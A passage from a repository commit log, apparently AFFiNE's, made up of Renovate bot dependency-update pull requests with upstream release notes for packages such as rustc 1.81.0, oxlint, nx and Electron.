| [react-router-dom](https://redirect.github.com/remix-run/react-router ) ([source](https://redirect.github.com/remix-run/react-router/tree/HEAD/packages/react-router-dom )) | [`6.26.1` -> `6.26.2`](https://renovatebot.com/diffs/npm/react-router-dom/6.26.1/6.26.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [react-virtuoso](https://virtuoso.dev/ ) ([source](https://redirect.github.com/petyosi/react-virtuoso )) | [`4.10.2` -> `4.10.4`](https://renovatebot.com/diffs/npm/react-virtuoso/4.10.2/4.10.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [serde](https://serde.rs ) ([source](https://redirect.github.com/serde-rs/serde )) | `1.0.209` -> `1.0.210` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [serde_json](https://redirect.github.com/serde-rs/json ) | `1.0.127` -> `1.0.128` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [sqlx](https://redirect.github.com/launchbadge/sqlx ) | `0.8.1` -> `0.8.2` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [storybook](https://redirect.github.com/storybookjs/storybook/tree/next/code/lib/cli ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/lib/cli )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/storybook/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [stripe](https://redirect.github.com/stripe/stripe-node ) | [`16.9.0` -> `16.11.0`](https://renovatebot.com/diffs/npm/stripe/16.9.0/16.11.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [tailwindcss](https://tailwindcss.com ) ([source](https://redirect.github.com/tailwindlabs/tailwindcss )) | [`3.4.10` -> `3.4.11`](https://renovatebot.com/diffs/npm/tailwindcss/3.4.10/3.4.11 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [typedoc](https://typedoc.org ) ([source](https://redirect.github.com/TypeStrong/TypeDoc )) | [`0.26.6` -> `0.26.7`](https://renovatebot.com/diffs/npm/typedoc/0.26.6/0.26.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [typescript](https://www.typescriptlang.org/ ) ([source](https://redirect.github.com/microsoft/TypeScript )) | [`5.5.4` -> `5.6.2`](https://renovatebot.com/diffs/npm/typescript/5.5.4/5.6.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [typescript](https://www.typescriptlang.org/ ) ([source](https://redirect.github.com/microsoft/TypeScript )) | [`5.5.4` -> `5.6.2`](https://renovatebot.com/diffs/npm/typescript/5.5.4/5.6.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [vite](https://vitejs.dev ) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.4.3` -> `5.4.4`](https://renovatebot.com/diffs/npm/vite/5.4.3/5.4.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [vite-plugin-dts](https://redirect.github.com/qmhc/vite-plugin-dts ) | [`4.1.0` -> `4.2.1`](https://renovatebot.com/diffs/npm/vite-plugin-dts/4.1.0/4.2.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [vitest](https://redirect.github.com/vitest-dev/vitest ) ([source](https://redirect.github.com/vitest-dev/vitest/tree/HEAD/packages/vitest )) | [`2.0.5` -> `2.1.0`](https://renovatebot.com/diffs/npm/vitest/2.0.5/2.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [wrangler](https://redirect.github.com/cloudflare/workers-sdk ) ([source](https://redirect.github.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.74.0` -> `3.77.0`](https://renovatebot.com/diffs/npm/wrangler/3.74.0/3.77.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.651.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36510-2024-09-12 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.650.0...v3.651.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
### [`v3.650.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36500-2024-09-11 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.649.0...v3.650.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
### [`v3.649.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36490-2024-09-10 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.645.0...v3.649.0 )
##### Features
- **endpoints:** codegen sync for request creation performance improvements ([#​6449](https://redirect.github.com/aws/aws-sdk-js-v3/issues/6449 )) ([c8e8f28](c8e8f28d07 ))
</details>
<details>
<summary>chromaui/addon-visual-tests (@​chromatic-com/storybook)</summary>
### [`v1.9.0`](https://redirect.github.com/chromaui/addon-visual-tests/blob/HEAD/CHANGELOG.md#v190-Fri-Sep-06-2024 )
[Compare Source](https://redirect.github.com/chromaui/addon-visual-tests/compare/v1.8.0...v1.9.0 )
##### 🚀 Enhancement
- Relay client-side fetch requests to the server using the Storybook channel API [#​331](https://redirect.github.com/chromaui/addon-visual-tests/pull/331 ) ([@​ghengeveld](https://redirect.github.com/ghengeveld ))
##### Authors: 1
- Gert Hengeveld ([@​ghengeveld](https://redirect.github.com/ghengeveld ))
***
</details>
<details>
<summary>conventional-changelog/commitlint (@​commitlint/cli)</summary>
### [`v19.5.0`](https://redirect.github.com/conventional-changelog/commitlint/blob/HEAD/@​commitlint/cli/CHANGELOG.md#1950-2024-09-11 )
[Compare Source](https://redirect.github.com/conventional-changelog/commitlint/compare/v19.4.1...v19.5.0 )
##### Features
- **cli:** use special errorCode for missing rules/config [#​4142](https://redirect.github.com/conventional-changelog/commitlint/issues/4142 ) ([#​4143](https://redirect.github.com/conventional-changelog/commitlint/issues/4143 )) ([d7070d8](d7070d8a49 ))
#### [19.4.1](https://redirect.github.com/conventional-changelog/commitlint/compare/v19.4.0...v19.4.1 ) (2024-08-28)
**Note:** Version bump only for package [@​commitlint/cli](https://redirect.github.com/commitlint/cli )
</details>
<details>
<summary>conventional-changelog/commitlint (@​commitlint/config-conventional)</summary>
### [`v19.5.0`](https://redirect.github.com/conventional-changelog/commitlint/blob/HEAD/@​commitlint/config-conventional/CHANGELOG.md#1950-2024-09-11 )
[Compare Source](https://redirect.github.com/conventional-changelog/commitlint/compare/v19.4.1...v19.5.0 )
**Note:** Version bump only for package [@​commitlint/config-conventional](https://redirect.github.com/commitlint/config-conventional )
#### [19.4.1](https://redirect.github.com/conventional-changelog/commitlint/compare/v19.4.0...v19.4.1 ) (2024-08-28)
**Note:** Version bump only for package [@​commitlint/config-conventional](https://redirect.github.com/commitlint/config-conventional )
#### [19.2.2](https://redirect.github.com/conventional-changelog/commitlint/compare/v19.2.1...v19.2.2 ) (2024-04-14)
**Note:** Version bump only for package [@​commitlint/config-conventional](https://redirect.github.com/commitlint/config-conventional )
</details>
<details>
<summary>marsidev/react-turnstile (@​marsidev/react-turnstile)</summary>
### [`v1.0.2`](https://redirect.github.com/marsidev/react-turnstile/releases/tag/v1.0.2 )
[Compare Source](https://redirect.github.com/marsidev/react-turnstile/compare/v1.0.1...v1.0.2 )
##### 🐞 Bug Fixes
- Add default exports - by [@​marsidev](https://redirect.github.com/marsidev ) [<samp>(2271b)</samp>](https://redirect.github.com/marsidev/react-turnstile/commit/2271bce )
##### [View changes on GitHub](https://redirect.github.com/marsidev/react-turnstile/compare/v1.0.1...v1.0.2 )
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.7.3`](https://redirect.github.com/nrwl/nx/releases/tag/19.7.3 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.7.2...19.7.3 )
##### 19.7.3 (2024-09-12)
##### 🚀 Features
- **core:** import warns when source and destination directories are different ([#​27875](https://redirect.github.com/nrwl/nx/pull/27875 ))
##### 🩹 Fixes
- **core:** handle sync generator failures ([#​27650](https://redirect.github.com/nrwl/nx/pull/27650 ))
- **core:** handle --no-interative for create-nx-workspace ([#​27702](https://redirect.github.com/nrwl/nx/pull/27702 ))
- **core:** respect filenames of inputs when computing task hash ([#​27873](https://redirect.github.com/nrwl/nx/pull/27873 ))
- **core:** handleErrors should display error cause if it exists ([#​27886](https://redirect.github.com/nrwl/nx/pull/27886 ))
- **gradle:** fix gradle app deps ([#​27865](https://redirect.github.com/nrwl/nx/pull/27865 ))
- **js:** keep refs to ignored files and allow opting out of pruning stale refs in typescript sync generator ([#​27636](https://redirect.github.com/nrwl/nx/pull/27636 ))
- **misc:** createNodesV2 plugins should show inference capabilities ([#​27896](https://redirect.github.com/nrwl/nx/pull/27896 ))
- **nx-cloud:** include nxCloudId when generating connect urls ([#​27882](https://redirect.github.com/nrwl/nx/pull/27882 ))
- **webpack:** handle relative paths for additionalEntryPath ([#​27885](https://redirect.github.com/nrwl/nx/pull/27885 ))
##### ❤️ Thank You
- Craigory Coppola [@​AgentEnder](https://redirect.github.com/AgentEnder )
- Emily Xiong [@​xiongemi](https://redirect.github.com/xiongemi )
- Jack Hsu [@​jaysoo](https://redirect.github.com/jaysoo )
- Leosvel Pérez Espinosa [@​leosvelperez](https://redirect.github.com/leosvelperez )
- Louie Weng [@​lourw](https://redirect.github.com/lourw )
- Nate Jacobs [@​iAmNathanJ](https://redirect.github.com/iAmNathanJ )
### [`v19.7.2`](https://redirect.github.com/nrwl/nx/releases/tag/19.7.2 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.7.1...19.7.2 )
##### 19.7.2 (2024-09-10)
##### 🩹 Fixes
- **core:** take nx-release-publish target defaults into account for implicit target ([#​27764](https://redirect.github.com/nrwl/nx/pull/27764 ))
- **release:** ensure git commits containing pipe can be parsed reliably ([#​27840](https://redirect.github.com/nrwl/nx/pull/27840 ))
##### ❤️ Thank You
- James Henry [@​JamesHenry](https://redirect.github.com/JamesHenry )
### [`v19.7.1`](https://redirect.github.com/nrwl/nx/releases/tag/19.7.1 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.7.0...19.7.1 )
##### 19.7.1 (2024-09-10)
##### 🚀 Features
- **release:** allow local dependency version protocols to be preserved, pnpm publish support ([#​27787](https://redirect.github.com/nrwl/nx/pull/27787 ))
##### 🩹 Fixes
- **core:** make sure sharedGlobals is referenced in default namedInputs ([#​27813](https://redirect.github.com/nrwl/nx/pull/27813 ))
- **release:** respect updateDependents being explicitly disabled in conventional commits ([#​27851](https://redirect.github.com/nrwl/nx/pull/27851 ))
##### ❤️ Thank You
- James Henry [@​JamesHenry](https://redirect.github.com/JamesHenry )
- Juri Strumpflohner [@​juristr](https://redirect.github.com/juristr )
### [`v19.7.0`](https://redirect.github.com/nrwl/nx/releases/tag/19.7.0 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.6.6...19.7.0 )
##### 19.7.0 (2024-09-09)
##### 🚀 Features
- **bundling:** add option to generate sourcemaps for Rollup build ([#​27539](https://redirect.github.com/nrwl/nx/pull/27539 ))
- **bundling:** add nxCopyAssetsPlugin for Vite to use in JS libs ([#​27593](https://redirect.github.com/nrwl/nx/pull/27593 ))
- **core:** add shutdown lifecycle hook to node executor ([#​27354](https://redirect.github.com/nrwl/nx/pull/27354 ))
- **core:** add sqlite db for nx ([#​26891](https://redirect.github.com/nrwl/nx/pull/26891 ))
- **core:** expose graph json type ([#​27496](https://redirect.github.com/nrwl/nx/pull/27496 ))
- **core:** return task results from imperative task runner ([#​27640](https://redirect.github.com/nrwl/nx/pull/27640 ))
- **core:** refactor graph implementation details ([#​27267](https://redirect.github.com/nrwl/nx/pull/27267 ))
- **core:** allow disabling registered task sync generators ([#​27638](https://redirect.github.com/nrwl/nx/pull/27638 ))
- **core:** allow skipping sync when running tasks ([#​27697](https://redirect.github.com/nrwl/nx/pull/27697 ))
- **core:** a
2024-09-13 05:21:56 +00:00
renovate
d8ca7c6d61
chore: bump up rustc version to v1.81.0 ( #8126 )
...
This PR contains the following updates:
| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust ) | minor | `1.80.1` -> `1.81.0` |
---
### Release Notes
<details>
<summary>rust-lang/rust (rustc)</summary>
### [`v1.81.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1810-2024-09-05 )
[Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.80.1...1.81.0 )
\==========================
<a id="1.81.0-Language"></a>
## Language
- [Abort on uncaught panics in `extern "C"` functions.](https://redirect.github.com/rust-lang/rust/pull/116088/ )
- [Fix ambiguous cases of multiple `&` in elided self lifetimes.](https://redirect.github.com/rust-lang/rust/pull/117967/ )
- [Stabilize `#[expect]` for lints (RFC 2383),](https://redirect.github.com/rust-lang/rust/pull/120924/ ) like `#[allow]` with a warning if the lint is *not* fulfilled.
- [Change method resolution to constrain hidden types instead of rejecting method candidates.](https://redirect.github.com/rust-lang/rust/pull/123962/ )
- [Bump `elided_lifetimes_in_associated_constant` to deny.](https://redirect.github.com/rust-lang/rust/pull/124211/ )
- [`offset_from`: always allow pointers to point to the same address.](https://redirect.github.com/rust-lang/rust/pull/124921/ )
- [Allow constraining opaque types during subtyping in the trait system.](https://redirect.github.com/rust-lang/rust/pull/125447/ )
- [Allow constraining opaque types during various unsizing casts.](https://redirect.github.com/rust-lang/rust/pull/125610/ )
- [Deny keyword lifetimes pre-expansion.](https://redirect.github.com/rust-lang/rust/pull/126762/ )
<a id="1.81.0-Compiler"></a>
## Compiler
- [Make casts of pointers to trait objects stricter.](https://redirect.github.com/rust-lang/rust/pull/120248/ )
- [Check alias args for well-formedness even if they have escaping bound vars.](https://redirect.github.com/rust-lang/rust/pull/123737/ )
- [Deprecate no-op codegen option `-Cinline-threshold=...`.](https://redirect.github.com/rust-lang/rust/pull/124712/ )
- [Re-implement a type-size based limit.](https://redirect.github.com/rust-lang/rust/pull/125507/ )
- [Properly account for alignment in `transmute` size checks.](https://redirect.github.com/rust-lang/rust/pull/125740/ )
- [Remove the `box_pointers` lint.](https://redirect.github.com/rust-lang/rust/pull/126018/ )
- [Ensure the interpreter checks bool/char for validity when they are used in a cast.](https://redirect.github.com/rust-lang/rust/pull/126265/ )
- [Improve coverage instrumentation for functions containing nested items.](https://redirect.github.com/rust-lang/rust/pull/127199/ )
- Target changes:
- [Add Tier 3 `no_std` Xtensa targets:](https://redirect.github.com/rust-lang/rust/pull/125141/ ) `xtensa-esp32-none-elf`, `xtensa-esp32s2-none-elf`, `xtensa-esp32s3-none-elf`
- [Add Tier 3 `std` Xtensa targets:](https://redirect.github.com/rust-lang/rust/pull/126380/ ) `xtensa-esp32-espidf`, `xtensa-esp32s2-espidf`, `xtensa-esp32s3-espidf`
- [Add Tier 3 i686 Redox OS target:](https://redirect.github.com/rust-lang/rust/pull/126192/ ) `i686-unknown-redox`
- [Promote `arm64ec-pc-windows-msvc` to Tier 2.](https://redirect.github.com/rust-lang/rust/pull/126039/ )
- [Promote `wasm32-wasip2` to Tier 2.](https://redirect.github.com/rust-lang/rust/pull/126967/ )
- [Promote `loongarch64-unknown-linux-musl` to Tier 2 with host tools.](https://redirect.github.com/rust-lang/rust/pull/126298/ )
- [Enable full tools and profiler for LoongArch Linux targets.](https://redirect.github.com/rust-lang/rust/pull/127078/ )
- [Unconditionally warn on usage of `wasm32-wasi`.](https://redirect.github.com/rust-lang/rust/pull/126662/ ) (see compatibility note below)
- Refer to Rust's \[platform support page]\[platform-support-doc] for more information on Rust's tiered platform support.
<a id="1.81.0-Libraries"></a>
## Libraries
- [Split core's `PanicInfo` and std's `PanicInfo`.](https://redirect.github.com/rust-lang/rust/pull/115974/ ) (see compatibility note below)
- [Generalize `{Rc,Arc}::make_mut()` to unsized types.](https://redirect.github.com/rust-lang/rust/pull/116113/ )
- [Replace sort implementations with stable `driftsort` and unstable `ipnsort`.](https://redirect.github.com/rust-lang/rust/pull/124032/ ) All `slice::sort*` and `slice::select_nth*` methods are expected to see significant performance improvements. See the [research project](https://redirect.github.com/Voultapher/sort-research-rs ) for more details.
- [Document behavior of `create_dir_all` with respect to empty paths.](https://redirect.github.com/rust-lang/rust/pull/125112/ )
- [Fix interleaved output in the default panic hook when multiple threads panic simultaneously.](https://redirect.github.com/rust-lang/rust/pull/127397/ )
<a id="1.81.0-Stabilized-APIs"></a>
## Stabilized APIs
- [`core::error`](https://doc.rust-lang.org/stable/core/error/index.html )
- [`hint::assert_unchecked`](https://doc.rust-lang.org/stable/core/hint/fn.assert_unchecked.html )
- [`fs::exists`](https://doc.rust-lang.org/stable/std/fs/fn.exists.html )
- [`AtomicBool::fetch_not`](https://doc.rust-lang.org/stable/core/sync/atomic/struct.AtomicBool.html#method.fetch_not )
- [`Duration::abs_diff`](https://doc.rust-lang.org/stable/core/time/struct.Duration.html#method.abs_diff )
- [`IoSlice::advance`](https://doc.rust-lang.org/stable/std/io/struct.IoSlice.html#method.advance )
- [`IoSlice::advance_slices`](https://doc.rust-lang.org/stable/std/io/struct.IoSlice.html#method.advance_slices )
- [`IoSliceMut::advance`](https://doc.rust-lang.org/stable/std/io/struct.IoSliceMut.html#method.advance )
- [`IoSliceMut::advance_slices`](https://doc.rust-lang.org/stable/std/io/struct.IoSliceMut.html#method.advance_slices )
- [`PanicHookInfo`](https://doc.rust-lang.org/stable/std/panic/struct.PanicHookInfo.html )
- [`PanicInfo::message`](https://doc.rust-lang.org/stable/core/panic/struct.PanicInfo.html#method.message )
- [`PanicMessage`](https://doc.rust-lang.org/stable/core/panic/struct.PanicMessage.html )
These APIs are now stable in const contexts:
- [`char::from_u32_unchecked`](https://doc.rust-lang.org/stable/core/char/fn.from_u32\_unchecked.html ) (function)
- [`char::from_u32_unchecked`](https://doc.rust-lang.org/stable/core/primitive.char.html#method.from_u32\_unchecked ) (method)
- [`CStr::count_bytes`](https://doc.rust-lang.org/stable/core/ffi/c_str/struct.CStr.html#method.count_bytes )
- [`CStr::from_ptr`](https://doc.rust-lang.org/stable/core/ffi/c_str/struct.CStr.html#method.from_ptr )
<a id="1.81.0-Cargo"></a>
## Cargo
- [Generated `.cargo_vcs_info.json` is always included, even when `--allow-dirty` is passed.](https://redirect.github.com/rust-lang/cargo/pull/13960/ )
- [Disallow `package.license-file` and `package.readme` pointing to non-existent files during packaging.](https://redirect.github.com/rust-lang/cargo/pull/13921/ )
- [Disallow passing `--release`/`--debug` flag along with the `--profile` flag.](https://redirect.github.com/rust-lang/cargo/pull/13971/ )
- [Remove `lib.plugin` key support in `Cargo.toml`. Rust plugin support has been deprecated for four years and was removed in 1.75.0.](https://redirect.github.com/rust-lang/cargo/pull/13902/ )
<a id="1.81.0-Compatibility-Notes"></a>
## Compatibility Notes
- Usage of the `wasm32-wasi` target will now issue a compiler warning and request users switch to the `wasm32-wasip1` target instead. Both targets are the same, `wasm32-wasi` is only being renamed, and this [change to the WASI target](https://blog.rust-lang.org/2024/04/09/updates-to-rusts-wasi-targets.html ) is being done to enable removing `wasm32-wasi` in January 2025.
- We have renamed `std::panic::PanicInfo` to `std::panic::PanicHookInfo`. The old name will continue to work as an alias, but will result in a deprecation warning starting in Rust 1.82.0.
`core::panic::PanicInfo` will remain unchanged, however, as this is now a *different type*.
The reason is that these types have different roles: `std::panic::PanicHookInfo` is the argument to the [panic hook](https://doc.rust-lang.org/stable/std/panic/fn.set_hook.html ) in std context (where panics can have an arbitrary payload), while `core::panic::PanicInfo` is the argument to the [`#[panic_handler]`](https://doc.rust-lang.org/nomicon/panic-handler.html ) in no_std context (where panics always carry a formatted *message*). Separating these types allows us to add more useful methods to these types, such as `std::panic::PanicHookInfo::payload_as_str()` and `core::panic::PanicInfo::message()`.
- The new sort implementations may panic if a type's implementation of [`Ord`](https://doc.rust-lang.org/std/cmp/trait.Ord.html ) (or the given comparison function) does not implement a [total order](https://en.wikipedia.org/wiki/Total_order ) as the trait requires. `Ord`'s supertraits (`PartialOrd`, `Eq`, and `PartialEq`) must also be consistent. The previous implementations would not "notice" any problem, but the new implementations have a good chance of detecting inconsistencies, throwing a panic rather than returning knowingly unsorted data.
<a id="1.81.0-Internal-Changes"></a>
## Internal Changes
These changes do not affect any public interfaces of Rust, but they represent
significant improvements to the performance or internals of rustc and related
tools.
- [Add a Rust-for Linux `auto` CI job to check kernel builds.](https://redirect.github.com/rust-lang/rust/pull/125209/ )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-13 04:38:05 +00:00
pengx17
df87300a3f
chore(electron): upgrade electron to v32 ( #8235 )
...
workaround provided by https://github.com/electron/electron/issues/43556
2024-09-13 04:23:10 +00:00
renovate
8800abded7
chore: bump up oxlint version to v0.9.5 ( #8155 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.9.2` -> `0.9.5`](https://renovatebot.com/diffs/npm/oxlint/0.9.2/0.9.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.9.5`](https://redirect.github.com/oxc-project/oxc/releases/tag/oxlint_v0.9.5 ): oxlint v0.9.5
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.4...oxlint_v0.9.5 )
#### \[0.9.5] - 2024-09-12
##### Features
- [`4b04f65`](https://redirect.github.com/oxc-project/oxc/commit/4b04f65 ) linter: Implement `no-plusplus` rule ([#​5570](https://redirect.github.com/oxc-project/oxc/issues/5570 )) (Cam McHenry)
- [`9ca2593`](https://redirect.github.com/oxc-project/oxc/commit/9ca2593 ) linter: Eslint/sort-keys ([#​4845](https://redirect.github.com/oxc-project/oxc/issues/4845 )) (Na'aman Hirschfeld)
- [`023c160`](https://redirect.github.com/oxc-project/oxc/commit/023c160 ) linter: Impl `Serialize` for `OxlintConfig` ([#​5594](https://redirect.github.com/oxc-project/oxc/issues/5594 )) (DonIsaac)
- [`24d6a47`](https://redirect.github.com/oxc-project/oxc/commit/24d6a47 ) linter: Implement `eslint/no-invalid-regexp` ([#​5443](https://redirect.github.com/oxc-project/oxc/issues/5443 )) (Boshen)
- [`c6bbf94`](https://redirect.github.com/oxc-project/oxc/commit/c6bbf94 ) minifier: Constant fold unary expression ([#​5669](https://redirect.github.com/oxc-project/oxc/issues/5669 )) (Boshen)
##### Bug Fixes
- [`af6d240`](https://redirect.github.com/oxc-project/oxc/commit/af6d240 ) linter: Panic in consistent-function-scoping ([#​5613](https://redirect.github.com/oxc-project/oxc/issues/5613 )) (DonIsaac)
- [`54e2e76`](https://redirect.github.com/oxc-project/oxc/commit/54e2e76 ) linter: `react/no_set_state` + `react/no_string_refs` rules find correct parent ([#​5615](https://redirect.github.com/oxc-project/oxc/issues/5615 )) (overlookmotel)
- [`3b87ac4`](https://redirect.github.com/oxc-project/oxc/commit/3b87ac4 ) linter: Fix no_unused_vars panic when encountering unicode ([#​5582](https://redirect.github.com/oxc-project/oxc/issues/5582 )) (Boshen)
##### Performance
- [`bfe9186`](https://redirect.github.com/oxc-project/oxc/commit/bfe9186 ) linter: Use `cow_replace` instead of `replace` ([#​5643](https://redirect.github.com/oxc-project/oxc/issues/5643 )) (dalaoshu)
- [`e3ae5db`](https://redirect.github.com/oxc-project/oxc/commit/e3ae5db ) linter: Use cow_to_ascii_lowercase/uppercase ([#​5637](https://redirect.github.com/oxc-project/oxc/issues/5637 )) (heygsc)
- [`a0370bf`](https://redirect.github.com/oxc-project/oxc/commit/a0370bf ) linter: Use cow_utils in no_script_url ([#​5633](https://redirect.github.com/oxc-project/oxc/issues/5633 )) (heygsc)
- [`37e922c`](https://redirect.github.com/oxc-project/oxc/commit/37e922c ) linter: `eslint/no_shadow_restricted_names` use `run_on_symbol` ([#​5618](https://redirect.github.com/oxc-project/oxc/issues/5618 )) (overlookmotel)
- [`0b7fccf`](https://redirect.github.com/oxc-project/oxc/commit/0b7fccf ) linter: `react/no_set_state` + `react/no_string_refs` rules reduce iteration over ancestors ([#​5616](https://redirect.github.com/oxc-project/oxc/issues/5616 )) (overlookmotel)
- [`2c3f3fe`](https://redirect.github.com/oxc-project/oxc/commit/2c3f3fe ) linter: Make `jsx_key` slightly faster ([#​5585](https://redirect.github.com/oxc-project/oxc/issues/5585 )) (Boshen)
- [`cd81d12`](https://redirect.github.com/oxc-project/oxc/commit/cd81d12 ) linter: Add `should_run` to check path only once to nextjs/no_typos ([#​5584](https://redirect.github.com/oxc-project/oxc/issues/5584 )) (Boshen)
- [`d18c896`](https://redirect.github.com/oxc-project/oxc/commit/d18c896 ) rust: Use `cow_utils` instead ([#​5664](https://redirect.github.com/oxc-project/oxc/issues/5664 )) (dalaoshu)
##### Documentation
- [`64f9575`](https://redirect.github.com/oxc-project/oxc/commit/64f9575 ) linter: Add plugin usage to example with configuration (Boshen)
- [`8c9179d`](https://redirect.github.com/oxc-project/oxc/commit/8c9179d ) linter: Fix typos ([#​5591](https://redirect.github.com/oxc-project/oxc/issues/5591 )) (Brian Donovan)
##### Refactor
- [`9e9435f`](https://redirect.github.com/oxc-project/oxc/commit/9e9435f ) linter: Add `LintFilter` ([#​5685](https://redirect.github.com/oxc-project/oxc/issues/5685 )) (DonIsaac)
- [`4f70fe5`](https://redirect.github.com/oxc-project/oxc/commit/4f70fe5 ) linter: Start internal/external split of LintPluginOptions ([#​5660](https://redirect.github.com/oxc-project/oxc/issues/5660 )) (DonIsaac)
- [`5ae9b48`](https://redirect.github.com/oxc-project/oxc/commit/5ae9b48 ) linter: Start internal/external split of `OxlintOptions` ([#​5659](https://redirect.github.com/oxc-project/oxc/issues/5659 )) (DonIsaac)
- [`c8bc6f0`](https://redirect.github.com/oxc-project/oxc/commit/c8bc6f0 ) linter: Use `std::ptr::eq` ([#​5649](https://redirect.github.com/oxc-project/oxc/issues/5649 )) (overlookmotel)
